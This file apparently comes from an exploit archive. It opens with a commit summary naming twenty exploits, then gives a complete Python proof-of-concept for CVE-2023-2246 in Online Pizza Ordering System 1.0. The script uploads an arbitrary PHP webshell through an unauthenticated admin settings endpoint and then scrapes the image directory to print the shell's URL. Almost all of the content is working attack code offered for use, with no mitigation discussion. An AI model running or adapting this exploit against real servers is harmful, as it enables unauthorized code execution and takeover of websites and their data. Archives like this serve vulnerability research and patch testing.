8945b320b5
20 changes to exploits/shellcodes/ghdb Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution Cmaps v8.0 - SQL injection EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal) File Thingie 2.5.7 - Remote Code Execution (RCE) Intern Record System v1.0 - SQL Injection (Unauthenticated) Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module Jedox 2022.4.2 - Code Execution via RPC Interfaces Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks Jedox 2022.4.2 - Remote Code Execution via Directory Traversal KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE) Online Pizza Ordering System v1.0 - Unauthenticated File Upload pluck v4.7.18 - Stored Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE) Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS) Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
74 lines
No EOL
2.4 KiB
Python
Executable file
74 lines
No EOL
2.4 KiB
Python
Executable file
# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
|
|
# Date: 03/05/2023
|
|
# Exploit Author: URGAN
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
|
|
# Version: v1.0
|
|
# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
|
|
# CVE: CVE-2023-2246
|
|
|
|
#!/usr/bin/env python3
|
|
# coding: utf-8
|
|
|
|
import os
|
|
import requests
|
|
import argparse
|
|
from bs4 import BeautifulSoup
|
|
|
|
# command line arguments
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument('-u', '--url', type=str, help='URL with http://')
|
|
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
|
|
args = parser.parse_args()
|
|
|
|
# if no arguments are passed, ask the user for them
|
|
if not (args.url and args.payload):
|
|
args.url = input('Enter URL with http://: ')
|
|
args.payload = input('Enter file path PHP webshell: ')
|
|
|
|
# URL Variables
|
|
url = args.url + '/admin/ajax.php?action=save_settings'
|
|
img_url = args.url + '/assets/img/'
|
|
|
|
filename = os.path.basename(args.payload)
|
|
|
|
files = [
|
|
('img',(filename,open(args.payload,'rb'),'application/octet-stream'))
|
|
]
|
|
|
|
# send a POST request to the server
|
|
resp_upl = requests.post(url, files = files)
|
|
status_code = resp_upl.status_code
|
|
if status_code == 200:
|
|
print('[+] File uploaded')
|
|
else:
|
|
print(f'[-] Error {status_code}: {resp_upl.text}')
|
|
raise SystemExit(f'[-] Script stopped due to error {status_code}.')
|
|
|
|
# send a GET request to the server
|
|
resp_find = requests.get(img_url)
|
|
|
|
# Use BeautifulSoup to parse the page's HTML code
|
|
soup = BeautifulSoup(resp_find.text, 'html.parser')
|
|
|
|
# get all <a> tags on a page
|
|
links = soup.find_all('a')
|
|
|
|
# list to store found files
|
|
found_files = []
|
|
|
|
# we go through all the links and look for the desired file by its name
|
|
for link in links:
|
|
file_upl = link.get('href')
|
|
if file_upl.endswith(filename): # uploaded file name
|
|
print('[+] Uploaded file found:', file_upl)
|
|
file_url = img_url + file_upl # get the full URL of your file
|
|
found_files.append(file_url) # add the file to the list of found files
|
|
|
|
# if the list is not empty, then display all found files
|
|
if found_files:
|
|
print('[+] Full URL of your file:')
|
|
for file_url in found_files:
|
|
print('[+] ' + file_url)
|
|
else:
|
|
print('[-] File not found') |